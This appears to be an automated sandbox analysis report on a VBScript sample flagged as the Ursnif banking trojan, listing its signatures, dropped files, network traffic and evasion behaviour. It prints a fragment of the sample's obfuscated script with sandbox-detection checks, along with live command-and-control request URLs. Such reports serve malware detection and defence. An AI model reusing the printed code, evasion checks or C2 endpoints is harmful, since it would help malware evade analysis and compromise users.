Analysis Report 1lfVu8BW8Kpg.vbs

Overview

General Information

Sample Name: 1lfVu8BW8Kpg.vbs
Analysis ID: 283794
MD5: e2da82911b3e14112c6f5ab4a125c621
SHA1: a2d7c88df9876d4bbc12988ff14f748beaed51ee
SHA256: fe880e2a4901242e0b99343a940fee1fa543bcdd5eed258992ccf50bdea56ae6

Most interesting Screenshot:

Detection

Ursnif
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\titanium.wav Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for submitted file
Source: 1lfVu8BW8Kpg.vbs Virustotal: Detection: 16% Perma Link
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: global traffic HTTP traffic detected: GET /api1/u_2Bstkw2Pz/SaYhmzqOSt84p_/2BLY1CxLCjamdhOPavxrT/cqEWnAGVcBeGq1uG/O7_2Bv1QXcln_2B/xuaySYH_2Fps0rwQAp/FDAwoOiTk/tPzxwzHkr4b9YWEY1MCO/GqWrOmT_2BMC_2FT8ej/Tm7pQHOpFvHinuaxqlva0V/2CXadPPD8vplI/mtS1FcuC/HhFtVWcYwfZmwsp9Z2yxxD7/GUeRdMN_2B/rXdMHXXN0GRlYk_2F/nmeGwKPwmRse/kEKu47fQ3zo/bx6Ci7Cz0cI_0A/_0DqGgxnJwDU6Oz_2BaCA/eakON4i3FQP_2F3F/6TXS3gN_2/FvyQn33x/a3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/2zG9CTXIjdzG6KKQ2Y/ciuUx9Cmx/LUg0lwdHO9cur1stRR4e/U_2Bidr1JZpa5hYruON/OUZHKpA4IQrVlLIccCKvY1/lmfS8erKXJ5CR/B1t19lDo/m2GBPfFF2Olj23_2FHMe6KT/lNJ_2Bxxlu/vh7nFU6b6CC3XZcko/sLCq2GebDl39/UKUprxF4Zfq/3s5sxverfggbx3/tvTk4PhC_2FOuwfc7PW0N/gA_2BOcpk0uenKQ_/2BYbOao_2FTiGt2/DxmKDNr58Xv8PwhsTv/_0A_0DiU5/dNj_2FrjqLKvjpYYB7jD/UrWooKA64wccmXnhV07/dy8AnKxbIwggo_2FGzcqCg/xyodxOTN HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml1.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x05247c79,0x01d68765</date><accdate>0x05247c79,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x05247c79,0x01d68765</date><accdate>0x05247c79,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x052940ce,0x01d68765</date><accdate>0x052940ce,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x052940ce,0x01d68765</date><accdate>0x052940ce,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x052940ce,0x01d68765</date><accdate>0x052940ce,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x052940ce,0x01d68765</date><accdate>0x052ba320,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Sep 2020 02:24:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: msapplication.xml.21.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.21.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.21.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.21.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.21.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.21.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.21.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.21.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.355881539.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355828611.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355999775.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355984560.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355946327.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355965105.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355920911.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355860552.0000000005E08000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.355881539.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355828611.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355999775.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355984560.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355946327.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355965105.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355920911.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355860552.0000000005E08000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Java / VBScript file with very long strings (likely obfuscated code)
Source: 1lfVu8BW8Kpg.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal92.troj.evad.winVBS@5/26@2/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\1lfVu8BW8Kpg.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 1lfVu8BW8Kpg.vbs Virustotal: Detection: 16%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\1lfVu8BW8Kpg.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7088 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7088 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 1lfVu8BW8Kpg.vbs Static file information: File size 1075883 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: c:\Rise\75\idea\toward\94\Scale\Live\34\Best\77\25\All\Whose.pdb source: wscript.exe, 00000000.00000003.199151237.0000017039D13000.00000004.00000001.sdmp, titanium.wav.0.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(((5594 - 126.0) - ((856 - 829.0) + 5439.0))) + "\")End FunctionFunction Maloney726()REM Shakespeare terbium tenacity hydrophobic304 Parsifal grandstand limpid pentane desire graveyard, radon477 posture Scotsman parenthesis showcase mode Tenneco whitewash Duquesne irate385 swift, yogi sociable nourish genii tutorial cheeky scold myeloid debase resorcinol, Andean704 gauze Chautauqua millennia Osgood Grecian561 SC guano bottle Siberia Vermont jerky Wesley iodide Saigon, mundane onomatopoeic perturbate. 999886 convenient rarefy effluvia archaic hydrophobia perceptible Ababa opthalmology asylum heterostructure Macbeth pharmacist hallucinogen bismuth. irruption deprecate informal spoil on error resume nextIf (InStr(WScript.ScriptName, cStr(392018303)) > 0 And qGiDn = 0) ThenExit FunctionEnd IfwEomcCIC = (100 + (-((64 - 1.0) + (37 - 3.0))))Garrisonian = (872 - ((79 + (1263 - 405.0)) - 68.0))' invade nucleotide deduce sucrose upbraid inducible Gresham Morgan Medford debase160 oscilloscope cavemen cartoon200, 1955747 inalterable Budweiser playtime Blaine. 1073795 tether coat decorous lily armistice Jugoslavia booth211 landfill, shipload505 feeble933 Saxony proffer whither bestir reputation Edinburgh Leigh Norton afar thirteen Poisson Arturo anthropoid dad Stanford inappreciable embeddable quality sourberry councilmen shrilly David798 drum indisposition, eject embarrass stone statue kayo. 7629185 concision Tobago200 biology ninefold551 shant rotunda elegiac Houdaille circumspect scissor scoreboard, 6293835 Bauhaus salary adhesion planetesimal carport sooth betatron stash flexure fettle Bismark. 7123853 odorous Tommie ore dyad indiscriminate Java commerce tear, 5119360 mommy sarcastic135 sentential If CreateObject("Scripting.FileSystemObject").GetFolder(UAiEPT).Files.Count < wEomcCIC Thenantiquated702REM familiar sheen671 fetal dreg248 keyboard Tammany Sullivan769 ideolect cannabis menarche economy Michelin insatiable fence pageant smite Brunswick wapiti brine clothesbrush Friedrich student Sutherland juggernaut45 Nadine contractual coastal Polynesia immense bombast usual toenail hypothesis ivy militarism livestock Swaziland bream, 5135256 coolheaded synthesis. afire nubile. told representative fixate Carolina incubus banter pet. leprosy disambiguate advance46 Gilligan addenda AZ Matthew suspect vertebral pushpin render tuba insipid propitious mukluk slept irreducible radii theft adopt retrovision dromedary bimodal Arden hardboiled brigantine madam motorcar osier. 823303 hying Amadeus drought room flatiron stink geocentric Asheville Yankton gs27 quinine rodent410 Dolan294 most sunshade censorial End IfSet anthropocentric124 = CreateObject("WScript.Shell")AHTdw = anthropocentric124.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(AHTdw).Files.Count < Garrisonian Then' tagging traipse carpetbagger sprinkle, 898734 Hertz

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\titanium.wav Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\titanium.wav Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.355881539.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355828611.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355999775.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355984560.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355946327.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355965105.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355920911.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355860552.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\1lfvu8bw8kpg.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\titanium.wav Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 5076 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: wscript.exe, 00000000.00000003.205656323.000001703BCF1000.00000004.00000001.sdmp Binary or memory string: LPIfn{rt0FgngvgHkng"WCkGRV"-"$eqemuwtg0|kr$."Vtwg
Source: wscript.exe, 00000000.00000002.230932031.000001703F140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.206867241.000001703BD7D000.00000004.00000001.sdmp Binary or memory string: 0UcxgVqHkng"WCkGRV"-"$eqemuwtg0|kr$."4
Source: wscript.exe, 00000000.00000002.230932031.000001703F140000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.230932031.000001703F140000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000003.205543738.000001703E783000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.205656323.000001703BCF1000.00000004.00000001.sdmp Binary or memory string: Ugv"HXSpFd?rp{Cp0PcogUrceg*WCkGRV"-"$eqemuwtg0|kr$+0Kvgou*+
Source: wscript.exe, 00000000.00000002.230932031.000001703F140000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: titanium.wav.0.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.355881539.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355828611.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355999775.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355984560.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355946327.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355965105.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355920911.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355860552.0000000005E08000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.355881539.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355828611.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355999775.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355984560.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355946327.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355965105.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355920911.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355860552.0000000005E08000.00000004.00000040.sdmp, type: MEMORY